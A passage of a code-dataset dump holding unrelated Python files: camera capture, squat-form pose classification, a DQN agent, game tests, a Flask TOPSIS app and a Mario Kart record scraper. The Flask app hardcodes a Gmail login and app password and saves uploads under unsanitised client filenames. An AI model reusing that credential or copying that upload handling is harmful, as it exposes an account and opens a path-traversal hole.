that filtering with 'args.prompts' has happend\n if args.verbose:\n print(f\"Additionally filtered category-prompt pairs sicne '--prompts' is provided: Using {len(cps)} number of cps\\n\")\n\n # print total number of (category, prompt) pairs\n if args.verbose:\n print(f\"Running for {len(cps)} number of prompts\\n\\n\") \n\n return cps\n\n\ndef get_unique_categories(cps):\n # list to save all categories\n all_categories = []\n\n # iterate for all category-prompt pairs\n for category_, prompt_ in cps: \n all_categories.append(category_)\n\n # remove duplicates to retrieve unique categories\n unique_categories = sorted(list(set(all_categories)))\n\n return unique_categories\n\n\ndef get_cps_for_given_category(cps, category):\n # list to save prompts for given category \n filtered_prompts = []\n\n # iterate for all category-prompt pairs\n for category_, prompt_ in cps:\n if category_ == category:\n filtered_prompts.append((category_, prompt_))\n \n # remove duplicates to retrieve cps for given category\n filtered_prompts = sorted(list(set(filtered_prompts)))\n return filtered_prompts","repo_name":"jellyheadandrew/CHORUS","sub_path":"utils/prepare_prompts.py","file_name":"prepare_prompts.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"44"} +{"seq_id":"20120907823","text":"__author__ = \"Nitin Dutt\"\n\nimport cv2\nimport datetime\nimport time\nimport os\n\nVIDEO_INDEX = 0 #this is based on /ls/video<index number on host machine>\nclass ExternalCamera(object):\n def opencv_take_screenshot(self, width = 1280, height = 1024):\n cam = cv2.VideoCapture(VIDEO_INDEX)\n cam.set(3, width)\n cam.set(4, height)\n cam.set(15, 0.1)\n cv2.namedWindow(\"test\")\n\n ret, frame = cam.read()\n cv2.imshow(\"test\", frame)\n\n if not ret:\n return False\n\n k = cv2.waitKey(3)\n\n date = datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n img_name = \"opencv_frame_{}.png\".format(date)\n cv2.imwrite(img_name, frame)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n\n cv2.destroyAllWindows()\n cam.release()\n\n\n def opencv_take_video(self, min = .5, width = 1280, height = 1024):\n timeout = time.time() + 60*min\n\n cam = cv2.VideoCapture(VIDEO_INDEX)\n cam.set(3, width)\n cam.set(4, height)\n cam.set(15, 0.1)\n #for opencv 2.4.8\n #fourcc = cv2.cv.CV_FOURCC(*'XVID')\n #for opencv 3.4 and above\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n\n date = datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n video_file_name = \"opencv_video_{}.avi\".format(date)\n\n # out = cv2.VideoWriter('output.avi', fourcc, 20.0, (1280,1024))\n out = cv2.VideoWriter(video_file_name, fourcc, 20.0, (int(cam.get(3)), int(cam.get(4))))\n\n while (cam.isOpened()):\n ret, frame = cam.read()\n if ret == True:\n # frame = cv2.flip(frame, 0)\n out.write(frame)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & int(time.time()) > timeout:\n break\n else:\n return False\n\n cam.release()\n out.release()\n cv2.destroyAllWindows()\n return video_file_name\n\n\n\n def FrameCaptureFromVideo(self, path): \n # Path to video file\n vidObj = cv2.VideoCapture(path)\n\t \n # Used as counter variable\n count = 0\n extractFramedir = os.path.join(os.getcwd(), datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n os.makedirs(extractFramedir)\n # checks whether frames were extracted\n success = 1\n\n while success:\n # vidObj object calls read\n # function extract frames\n success, image = vidObj.read()\n\n # Saves the frames with frame-count\n cv2.imwrite(extractFramedir + \"/\" + \"frame%d.jpg\" % count, image)\n count += 1\n \n\n\n\n","repo_name":"nitindutt/machine_learning_based_text_reader_from_image","sub_path":"ExternalCamera.py","file_name":"ExternalCamera.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19924736796","text":"import pickle\n\nimport cv2 as cv\nimport argparse\nfrom FullBody import Body, BODY_PARTS_LIST\nimport utils\nimport mediapipe as mp\nfrom model_network import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', default=0, help='Path to image or video. Skip to capture frames from camera')\nparser.add_argument('--display_width', default=1280, type=int, help='Resize input to specific width.')\nparser.add_argument('--display_height', default=920, type=int, help='Resize input to specific height.')\nparser.add_argument('--save', default=False, type=bool, help='Save the video output')\nparser.add_argument('--data_set_mode', default=False, type=bool, help='Mark true to create a dataset.')\nparser.add_argument('--output_data', default=False, type=bool, help='Mark true to create a run_dir.')\n\nINSTRUCTIONS_COLOR = (0, 0, 0)\nCOUNTER_COLOR = (0, 0, 0)\nEXIT_COLOR = (0, 0, 255)\nON_LINE_COLOR = (255, 0, 0)\nOFF_LINE_COLOR = (0, 0, 255)\nlast_squat_predict = None\npredict_mistake = None\n\nargs = parser.parse_args() # Load arguments\ndata_set_mode = args.data_set_mode # Create mode for a data set\noutput_data = args.output_data # Flag to indicate if data should be outputed\nmodel_knn_2_d = 'models/model_number_0_2d_knn.pickle' # Trained KNN 2d model\nmodel_net_3_d = 'models/model_number_0_3d_net.pickle' # Trained net 3d model\nmodel_knn_multi_2_d = 'models/model_number_multi_0_3d_knn.pickle' # Trained knn for multi classification\nif output_data:\n run_dir = utils.create_run_dir()\nelse:\n run_dir = None\nif data_set_mode:\n data_types = ['good', 'high_waste', 'knee_collapse', 'lifting_heels']\n type_index = 0\n sample_count = {'good': 30, 'high_waste': 10, 'knee_collapse': 10,\n 'lifting_heels': 10} # How many samples should the system capture\n user_body = Body(run_dir, data_types[0]) # Create a Body object\nelse:\n user_body = Body(run_dir)\ndisplay_width = args.display_width\ndisplay_height = args.display_height\nmpPose = mp.solutions.pose\npose = mpPose.Pose()\nmpDraw = mp.solutions.drawing_utils\nmodel_net, model_knn, model_multi = utils.load_models([model_net_3_d, model_knn_2_d, model_knn_multi_2_d])\n\ncap = cv.VideoCapture(args.input if args.input else 0)\noutput = None\nif args.save:\n fourcc = cv.VideoWriter_fourcc(*'MP4V')\n output = cv.VideoWriter('training_example.mp4', fourcc, 15.0, (display_width, display_height))\nframe_counter = 0\nstanding_line_points = None\ncalibrate_dur = 5\nfps = 15\ncalibrate_frames = calibrate_dur * fps\nsquat_count = 0\n\n\ndef draw_standing_line(frame, standing_line):\n \"\"\"\n Draw the standing line on frame\n :param frame: Frame to draw on\n :param standing_line: Standing line coordinates\n \"\"\"\n if standing_line:\n if user_body.on_standing_line():\n cv.line(frame, standing_line[0], standing_line[1], ON_LINE_COLOR, 2)\n else:\n cv.line(frame, standing_line[0], standing_line[1], OFF_LINE_COLOR, 2)\n\n\ndef insert_instructions(frame, txt):\n \"\"\"\n Insert a user instruction on the top of the frame\n :param frame: Frame to insert on\n :param txt: Instruction to insert\n \"\"\"\n cv.putText(frame, txt, (10, 20), cv.FONT_HERSHEY_SIMPLEX, 0.5, INSTRUCTIONS_COLOR, 2)\n\n\ndef insert_squat_count(frame):\n \"\"\"\n Insert the squat count on the frame\n :param frame: Frame to insert on\n \"\"\"\n global squat_count\n height = frame.shape[0]\n cv.putText(frame, \"Squat count: {}\".format(squat_count), (10, height - 20), cv.FONT_HERSHEY_SIMPLEX, 0.5,\n COUNTER_COLOR, 1)\n\n\ndef show_img(frame, save_frame=True):\n \"\"\"\n Present the frame to the user and save the frame if got save_frame\n :param frame: Frame to present\n :param save_frame: Flag to save the frame\n \"\"\"\n global frame_counter, data_types, type_index\n width, height = frame.shape[1], frame.shape[0]\n cv.putText(frame, 'To quit press q', (width - 150, height - 10), cv.FONT_HERSHEY_SIMPLEX, 0.5, EXIT_COLOR, 2)\n if data_set_mode:\n cv.putText(frame, 'Perform type: {} - {} To go'.format(data_types[type_index],\n sample_count[data_types[type_index]] - squat_count),\n (10, 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, INSTRUCTIONS_COLOR, 2)\n resized = cv.resize(frame, (display_width, display_height))\n cv.imshow('OpenPose using OpenCV', resized)\n if save_frame:\n file_name = f'{run_dir}/img_samples/img_frame={frame_counter}.jpg'\n cv.imwrite(file_name, frame)\n if output:\n output.write(resized)\n\n\ndef get_points(frame):\n \"\"\"\n Get the body points from the CV Network\n :param frame: Frame to detect\n :return: The points of the body parts\n \"\"\"\n points = None\n global standing_line_points\n imgRGB = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n results = pose.process(imgRGB) # Process img\n if results.pose_landmarks:\n points = list()\n for id, lm in enumerate(results.pose_landmarks.landmark):\n h, w, c = frame.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n points.append((cx, cy))\n if not standing_line_points:\n standing_line_points = utils.get_standing_line(w, h, 0.07, 0.35)\n user_body.set_standing_line(standing_line_points, (w, h))\n return points, results\n\n\ndef calibrate_mode(frame, points, results):\n \"\"\"\n Runs on calibrate mode is responsible to calibrate the Body object\n :param frame: Current frame detected\n :param points: Points detected\n :param results: Reguarding the points detected\n \"\"\"\n global calibrate_frames, frame_counter\n user_body.calibrate_class(points, frame_counter)\n draw_standing_line(frame, standing_line_points)\n if user_body.is_ready() and calibrate_frames != 0:\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n insert_instructions(frame, 'Calibrating.. stand still. frames left to start: {}'.format(calibrate_frames))\n calibrate_frames -= 1\n elif not user_body.is_ready():\n calibrate_frames = calibrate_dur * fps\n insert_instructions(frame, 'Calibrating.. place your heels on the red line. frames left to start: '\n '{}'.format(calibrate_frames))\n elif user_body.is_ready() and calibrate_frames == 0:\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n insert_instructions(frame, 'Finished calibrating! start squatting.')\n user_body.calibrate_mode = False\n user_body.sample_squat_mode = True\n show_img(frame, save_frame=False)\n\n\ndef sample_squat(frame, points, results):\n \"\"\"\n Runs the sample squat stage, initializes the squat on the Body class\n :param frame: Frame detected\n :param points: Points detected\n \"\"\"\n global frame_counter\n instruction = user_body.check_body_points(points, frame_counter)\n if user_body.got_valid_points():\n if not user_body.init_squat_ref():\n insert_instructions(frame, 'Now lets sample a reference squat. Start a squat')\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n else:\n insert_instructions(frame, 'Finished sampling. You can start squatting!')\n user_body.sample_squat_mode = False\n else:\n insert_instructions(frame, instruction)\n draw_standing_line(frame, standing_line_points)\n show_img(frame, save_frame=False)\n\n\ndef get_multi_predict():\n pass\n\n\ndef run(frame, points, results):\n global frame_counter, squat_count, last_squat_predict, predict_mistake\n instruction = user_body.check_body_points(points, frame_counter)\n draw_standing_line(frame, standing_line_points)\n if user_body.got_valid_points():\n if last_squat_predict is not None:\n if predict_mistake is not None and last_squat_predict == 0:\n insert_instructions(frame, 'Squat {}: knn {}'.format(squat_count, utils.MULTI_LABELS[predict_mistake]))\n else:\n insert_instructions(frame, 'Squat {}: knn {}'.format(squat_count, 'Good Job!'))\n else:\n insert_instructions(frame, 'Squat!')\n insert_squat_count(frame)\n if user_body.squat():\n centered, three_d = user_body.get_squat()\n if not data_set_mode:\n last_squat_predict = get_knn_squat_predict(model_knn, centered)\n if last_squat_predict == 0:\n predict_mistake = get_knn_squat_predict(model_multi, centered)\n else:\n predict_mistake = None\n squat_count += 1\n mpDraw.draw_landmarks(frame, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\n if data_set_mode:\n show_img(frame, save_frame=False)\n else:\n show_img(frame, save_frame=True)\n else:\n insert_instructions(frame, instruction)\n insert_squat_count(frame)\n show_img(frame, save_frame=False)\n\n\ndef get_knn_squat_predict(knn, centered):\n centered = utils.convert_list_to_np(centered)\n indices_2d = utils.find_slicing_indices(int(knn.get_dim() / 30), utils.find_min_y_index(centered)[0],\n len(centered))\n data_knn = centered[indices_2d]\n predict_knn = knn.predict(data_knn.reshape(1, knn.get_dim()))\n return predict_knn[0]\n\n\ndef get_squat_predict():\n global model_knn, model_net\n centered, three_d = user_body.get_squat()\n three_d = utils.convert_list_to_np(three_d)\n centered = utils.convert_list_to_np(centered)\n indices_3d = utils.find_slicing_indices(int(model_net.get_dim() / 45), utils.find_min_y_index(three_d)[0],\n len(three_d))\n indices_2d = utils.find_slicing_indices(int(model_knn.get_dim() / 30), utils.find_min_y_index(centered)[0],\n len(centered))\n data_knn = centered[indices_2d]\n data_net = three_d[indices_3d]\n predict_knn = model_knn.predict(data_knn.reshape(1, model_knn.get_dim()))\n data_test_manager = DataManager(torch.tensor([data_net]), torch.tensor([1]))\n data_net_it = data_test_manager.get_data_iterator()\n for data in data_net_it:\n input, label = data\n predict_net = model_net.predict(input.float())\n # predict_net = [None]\n return predict_net[0].item(), predict_knn[0]\n\n\ndef data_set_creator(frame, points, results):\n global data_types, type_index, squat_count, sample_count, cap\n if squat_count == sample_count[data_types[type_index]]:\n cap.release()\n cv.destroyAllWindows()\n print('Saving info for type {}'.format(data_types[type_index]))\n user_body.output_data_set_points()\n type_index += 1\n if type_index >= len(data_types):\n return False\n else:\n user_body.training_dir = data_types[type_index]\n user_body.calibrate_mode = True\n squat_count = 0\n cap = cv.VideoCapture(args.input if args.input else 0)\n return True\n run(frame, points, results)\n return True\n\n\nif __name__ == '__main__':\n while cv.waitKey(1) < 0:\n hasFrame, frame = cap.read()\n frame_counter += 1\n if not hasFrame:\n cv.waitKey()\n break\n points, results = get_points(frame)\n if not points:\n continue\n if user_body.calibrate_mode:\n calibrate_mode(frame, points, results)\n elif user_body.sample_squat_mode:\n sample_squat(frame, points, results)\n else:\n if data_set_mode:\n if not data_set_creator(frame, points, results):\n break\n else:\n continue\n else:\n run(frame, points, results)\n if output:\n output.release()\n cap.release()\n cv.destroyAllWindows()\n if not data_set_mode and run_dir:\n print('Outputting data...')\n user_body.output_points()\n","repo_name":"romc57/EngineeringFinalProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26373976829","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport numpy as np\nimport math\nimport config\n\nfrom dqn_network_model import DeepQNetwork_cnn\n\nT.manual_seed(999)\n# from torch.utils.tensorboard import SummaryWriter\n# from tensorboardX import SummaryWriter\n# writer = SummaryWriter()\n\nclass Agent:\n def __init__(self, gamma, epsilon, lr, input_dims, batch_size, \n n_actions, c_step=300,\n max_mem_size=2000, eps_end=0.01, eps_dec=20000, start_eps_dec=1000):\n self.gamma = gamma\n self.epsilon = epsilon\n self.eps_max = epsilon\n self.eps_min = eps_end\n self.eps_dec = eps_dec\n self.start_eps_dec = start_eps_dec\n\n self.action_space = [i for i in range(n_actions)]\n self.mem_size = max_mem_size\n self.batch_size = batch_size\n self.c_step = c_step\n self.lr = lr\n\n self.mem_cntr = 0\n self.learn_cntr = 0\n self.loss_his = []\n\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n\n self.q_eval = DeepQNetwork_cnn(self.lr,\n n_actions=n_actions, input_dims=input_dims,\n fc1_dims=256,\n fc2_dims=32).to(self.device)\n\n self.q_target = DeepQNetwork_cnn(self.lr,\n n_actions=n_actions,input_dims=input_dims,\n fc1_dims=256,\n fc2_dims=32).to(self.device)\n\n self.q_target.load_state_dict(self.q_eval.state_dict())\n self.q_target.eval()\n\n # transition: [s, a, r, s_, done]\n self.state_memory = np.zeros((self.mem_size, 1, *input_dims), dtype=np.float32)\n self.state2_memory = np.zeros((self.mem_size, 7) , dtype=np.int32)\n self.action_memory = np.zeros(self.mem_size , dtype=np.int32)\n self.reward_memory = np.zeros(self.mem_size , dtype=np.float32)\n self.new_state_memory = np.zeros((self.mem_size, 1, *input_dims), dtype=np.float32)\n self.new_state2_memory = np.zeros((self.mem_size, 7) , dtype=np.int32)\n self.terminal_memory = np.zeros(self.mem_size , dtype=np.bool)\n\n def store_transition(self, state, action, reward, state_, done):\n idx = self.mem_cntr % self.mem_size\n self.state_memory[idx] = state[0]\n self.state2_memory[idx] = state[1]\n self.action_memory[idx] = action\n self.reward_memory[idx] = reward\n self.new_state_memory[idx] = state_[0]\n self.new_state2_memory[idx] = state_[1]\n self.terminal_memory[idx] = done\n\n self.mem_cntr += 1\n\n @T.no_grad()\n def choose_action(self, observation):\n if np.random.random() > self.epsilon:\n self.q_eval.eval()\n state = T.tensor([observation[0]]).to(self.q_eval.device)\n state2 = T.tensor([observation[1]]).to(self.q_eval.device)\n actions = self.q_eval([state, state2], excution=True)\n action = T.argmax(actions).item()\n ####################################\n # print(\"*********************\")\n # print(actions, action)\n # print(\"*********************\")\n ####################################\n else:\n action = np.random.choice(self.action_space)\n\n return action\n\n def learn(self):\n loss = None\n\n if self.mem_cntr >= self.batch_size:\n\n max_mem = min(self.mem_cntr, self.mem_size)\n batch = np.random.choice(max_mem, self.batch_size, replace=False)\n batch_idx = np.arange(self.batch_size, dtype=np.int32)\n\n state_batch = T.tensor(self.state_memory[batch]).to(self.q_eval.device)\n state2_batch = T.tensor(self.state2_memory[batch]).to(self.q_eval.device)\n reward_batch = T.tensor(self.reward_memory[batch]).to(self.q_eval.device)\n new_state_batch = T.tensor(self.new_state_memory[batch]).to(self.q_eval.device)\n new_state2_batch = T.tensor(self.new_state2_memory[batch]).to(self.q_eval.device)\n terminal_batch = T.tensor(self.terminal_memory[batch]).to(self.q_eval.device)\n action_batch = self.action_memory[batch]\n\n self.q_eval.train()\n q_eval = self.q_eval.forward([state_batch, state2_batch])[batch_idx, action_batch]\n # q_eval = q_eval[action_batch]\n\n with T.no_grad():\n self.q_target.eval()\n q_next = self.q_target.forward([new_state_batch, new_state2_batch])\n\n q_next[terminal_batch] = 0.\n q_target = reward_batch + self.gamma * T.max(q_next, dim=1)[0]\n\n # caculate the loss between q target and q eval\n loss = self.q_eval.loss(q_eval, q_target)\n self.loss_his.append(loss)\n\n # update the evaluation q network\n self.q_eval.optimizer.zero_grad()\n loss.backward()\n # for param in self.q_eval.parameters():\n # param.grad.data.clamp_(-1, 1)\n if config.clip:\n nn.utils.clip_grad_norm_(self.q_eval.parameters(), config.clip)\n\n # tot_norm = 0; cntr = 0\n # for parm in self.q_eval.parameters():\n # grad_norm = parm.grad.data.norm().item()\n # tot_norm += grad_norm\n # cntr += 1\n # print(\"[{}] \".format(cntr), grad_norm)\n # print(\"avg. : \", tot_norm / cntr)\n\n\n self.q_eval.optimizer.step()\n\n # epsilon decay\n if self.epsilon >= self.eps_min:\n if self.learn_cntr < self.start_eps_dec:\n self.epsilon = self.eps_max\n else:\n self.epsilon = self.eps_min + (self.eps_max - self.eps_min) *\\\n math.exp(-1. * (self.learn_cntr-self.start_eps_dec) / self.eps_dec)\n else:\n self.epsilon = self.eps_min\n\n self.learn_cntr += 1\n\n # replace targent network very c steps\n if self.learn_cntr % self.c_step == 0:\n self.q_target.load_state_dict(self.q_eval.state_dict())\n\n return loss\n","repo_name":"colinlee0924/drl-path-planning","sub_path":"dqn_go2pods_oneChannel.py","file_name":"dqn_go2pods_oneChannel.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8335428631","text":"import unittest\n\nfrom game import MoveNotAllowedError, GameInitiationError\nfrom nlg import NLGame\nfrom sentence_classifier.sentence_classifier import SentenceClassifier\nfrom traveling_tourist import TravelingTourist\nfrom helper_functions import _assert_almost_equel\n\nclass TestNLG(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_game_initiation(self):\n test_sets = [\n {\n \"possible_moves\": [\"my\", \"name\", \"is\",\"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"my\", \"name\"],\n \"expect_raise\": False\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"name\"],\n \"expect_raise\": True\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [],\n \"expect_raise\": True\n },\n {\n \"possible_moves\": [\"my\", \"name\", \"is\", \"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"\",\n \"current_game_state\": [\"my\"],\n \"expect_raise\": True\n }\n ]\n for game in test_sets:\n print(game)\n if game[\"expect_raise\"]:\n with self.assertRaises(GameInitiationError):\n self.t = NLGame(\n vocabulary=game[\"possible_moves\"],\n starting_word=game[\"starting_word\"],\n current_game_state=game[\"current_game_state\"]\n )\n else:\n self.t = NLGame(\n vocabulary=game[\"possible_moves\"],\n starting_word=game[\"starting_word\"],\n current_game_state=game[\"current_game_state\"]\n )\n \n \n def test_check_moves(self):\n test_sets = [\n {\n \"possible_moves\": [\"my\", \"name\", \"is\",\"was\", \"not\", \"john\", \"michael\"],\n \"starting_word\": \"my\",\n \"current_game_state\": [\"my\", \"name\"],\n \"test_possible\":[\"is\", \"john\"],\n \"test_impossible\": [\"slkdfj\", \"\"]\n }\n ]\n for test_set in test_sets:\n self.t = NLGame(\n vocabulary=test_set[\"possible_moves\"],\n starting_word=test_set[\"starting_word\"],\n current_game_state=test_set[\"current_game_state\"]\n )\n for not_allowed in test_set[\"test_impossible\"]:\n self.assertFalse(self.t._check_move_possible(not_allowed))\n\n for allowed in test_set[\"test_possible\"]:\n self.assertTrue(self.t._check_move_possible(allowed))\n self.tearDown()\n\nclass TestSentenceClassifier(unittest.TestCase):\n def setUp(self):\n self.sentence_classifier =SentenceClassifier()\n\n def test_accept(self):\n human = [\"my name is michael\", \"my name is michael\"]\n not_human = [\"my name name name\", \"john my michael name\"]\n for sentence in human:\n self.assertTrue(self.sentence_classifier.sentence_is_human(sentence.split()))\n","repo_name":"JeromeBau/mcts","sub_path":"test/test_nlg.py","file_name":"test_nlg.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"11997618929","text":"from pathlib import Path\n\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport smtplib\n\napp = Flask(__name__)\n\n\ndef vector_normalize(dataset, ncol, df):\n for i in range(1, ncol):\n y = 0\n for j in range(len(dataset)):\n print(df.iloc[j, i])\n y = y + df.iloc[j, i] ** 2\n y = y ** 0.5\n for j in range(len(df)):\n dataset.iat[j, i] = (dataset.iloc[j, i] / y)\n return dataset\n\n\n\"\"\"**Step 3:Weight Assignment**\"\"\"\n\n\ndef weight(df, ncol, weights):\n weights = list(map(int, weights.split(',')))\n print(weights)\n for i in range(1, ncol):\n for j in range(len(df)):\n df.iat[j, i] = df.iloc[j, i] * weights[i - 1]\n return df\n\n\n\"\"\"**Step 4:Finding ideal best and ideal worst**\"\"\"\n\n\ndef Calc_ideal_Values(df, nCol, impact):\n # calculating ideal best and ideal worst\n ideal_positive_value = (df.max().values)[\n 1:] # positive value i.e if impact is + then maximum will be our ideal positive value\n ideal_negative_value = (df.min().values)[\n 1:] # negative value i.e if impact is + then minimum will be our ideal negative value\n # now we need to check when our impact is negative\n # now we will run our loop from 1 to last column and check if our impact is negative or not if it is then we need to interchange the ideal postive and ideal negative\n\n for i in range(1, nCol):\n if impact[i - 1] == '-':\n ideal_positive_value[i - 1], ideal_negative_value[i - 1] = ideal_negative_value[i - 1], \\\n ideal_positive_value[i - 1]\n return ideal_positive_value, ideal_negative_value\n\n\n\"\"\"**Step 5:Calculate Euclidean Distance ,score and Rank**\"\"\"\n\nimport math\n\n\ndef euclidean_distance(dataset, ncol, weights, impact, df1):\n # first of all normalize the vector\n dataset = vector_normalize(dataset, ncol, df1)\n # second:weight assignment\n dataset1 = weight(dataset, ncol, weights)\n\n # ideal postive and ideal negtaive values calculation\n ideal_p, ideal_n = Calc_ideal_Values(dataset1, ncol, impact)\n\n # calculating the euclidean distance\n perf_score = []\n for i in range(len(dataset1)):\n s_positive, s_negative = 0.0, 0.0\n for j in range(1, ncol):\n s_positive = s_positive + (ideal_p[j - 1] - dataset1.iloc[i, j]) ** 2\n s_negative = s_negative + (ideal_n[j - 1] - dataset1.iloc[i, j]) ** 2\n\n s_positive = math.sqrt(s_positive)\n s_negative = math.sqrt(s_negative)\n\n perf_score.append(s_negative / (s_negative + s_positive))\n # print(perf_score)\n # Score\n df1['Topsis Score'] = perf_score\n # #Rank\n df1['Rank'] = (df1['Topsis Score'].rank(method='max', ascending=False))\n df1 = df1.astype({\"Rank\": int})\n\n df1.to_csv('102003466-result.csv', index=False)\n return df1\n\n\nimport sys\nimport os\n\n\n# dataset, ncol, weights, impact, df1\n# def main():\n# euclidean_distance(data1, len(data1.columns), weights, impact, data)\n\n\n@app.route('/')\ndef hello_world(): # put application's code here\n return render_template('index.html')\n\n\n@app.route('/topics', methods=['POST'])\ndef topics(): # put application's code here\n res = request.values.to_dict()\n file = request.files['file']\n file.save(file.filename)\n print(file.name)\n ex_df = pd.read_excel(os.path.abspath(file.filename), engine='openpyxl',\n )\n print(os.path.abspath(file.filename))\n ex_df.to_csv(f'{Path(file.filename).stem}.csv')\n print(os.path.dirname(os.path.abspath(file.filename)))\n df = pd.DataFrame(pd.read_csv(f'{os.path.dirname(os.path.abspath(file.filename))}/{Path(file.filename).stem}.csv'))\n weights = str(res['weights'])\n impacts = str(res['impacts'])\n df1 = df.copy()\n df.drop('Fund Name', inplace=True, axis=1)\n result = euclidean_distance(df, len(df.columns), weights,\n impacts,\n df.copy())\n result['Fund Name'] = df1['Fund Name']\n gmail_user = 'sahilkadiyan9817@gmail.com'\n gmail_password = 'sdmsywzqwtqbzbre'\n\n sent_from = gmail_user\n to = [res['email']]\n subject = 'Lorem ipsum dolor sit amet'\n body = result\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n\n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n smtp_server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n smtp_server.ehlo()\n smtp_server.login(gmail_user, gmail_password)\n smtp_server.sendmail(sent_from, to, email_text)\n smtp_server.close()\n print(\"Email sent successfully!\")\n except Exception as ex:\n print(\"Something went wrong….\", ex)\n\n return 'success'\n # return \"success\"\n","repo_name":"sahilkadiyan/topsis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6768630059","text":"import re\nimport numpy as np\nimport pandas as pd\nimport requests\n\nfrom bs4 import BeautifulSoup\n\nimport infoCourselist\n\nmk8_course = infoCourselist.mk8_abbrv\nmk8_course_full = infoCourselist.mk8_full\nmk8_course_lower = [x.lower() for x in infoCourselist.mk8_full]\n\ndef partial_match(input, full=mk8_course_lower):\n match = []\n idx = 0\n for track in full:\n if track.lower().find(input) != -1:\n match.append(idx)\n idx += 1\n return match\n\ndef name_conversion(input, abbrv=mk8_course, full=mk8_course_lower):\n found = None\n idx = 0\n for track in full:\n if track.lower() == input:\n found = abbrv[idx]\n idx += 1\n\n return found\n\ndef nita(input, place=None, abbrv=mk8_course):\n url = 'https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vRDdedRm18RtIu2hB9l5WrbaClaIPnZAVh_Xf7IeGzmsOVHcNdjoD3VWo8EdMxJ7JKdtcbFnebLjCcV/pubhtml'\n _ = requests.get(url)\n data = np.array(re.findall(r'(\\d+):(\\d+).(\\d+)', requests.get(url).text))\n all_time = data[0:560].reshape(14,10,4,3)\n course = abbrv.index(str.lower(input))\n\n if place:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][place-1]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n \n else:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][0]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n\ndef wiggler(input, place=None, abbrv=mk8_course):\n url = 'https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vTOT3PJwMcMrOE--rBPV3Vz1SUegmpmpCtP8NzMQoxHljks2JDaYQ8H1pj4Pi0i5xOmnnS3eDAxc4zY/pubhtml'\n _ = requests.get(url)\n data = np.array(re.findall(r'(\\d+):(\\d+).(\\d+)', requests.get(url).text))\n all_time = data[0:560].reshape(14,10,4,3)\n course = abbrv.index(str.lower(input))\n\n if place:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][place-1]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n \n else:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][0]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n\ndef wr(input, abbrv=mk8_course, full=mk8_course_lower):\n url = 'https://mkwrs.com/mk8dx/wrs.php'\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n course = full[abbrv.index(input.lower())]\n course_link = 'track='+mk8_course_full[abbrv.index(input.lower())].replace(' ','+')\n links = []\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n wr_link = 'not available'\n for idx,link in enumerate(links):\n if link.endswith(course_link):\n temp = links[idx+1]\n if temp.startswith('https://www.youtube.com/'):\n wr_link = temp\n\n data = np.char.lower(np.array((soup.get_text().split('\\n'))))\n \n match = np.where(data==course)[0][0]\n time = data[match+1].split('\\'')[0]+':'+data[match+1].split('\\'')[1].split('\"')[0]+'.'+data[match+1].split('\\'')[1].split('\"')[1]\n time = data[match+1].split('\\'')[0]+':'+data[match+1].split('\\'')[1].split('\"')[0]+'.'+data[match+1].split('\\'')[1].split('\"')[1]\n player = data[match+2]\n return time+'\\tby '+player+'\\tvideo: '+wr_link\n\nif __name__ == '__main__':\n 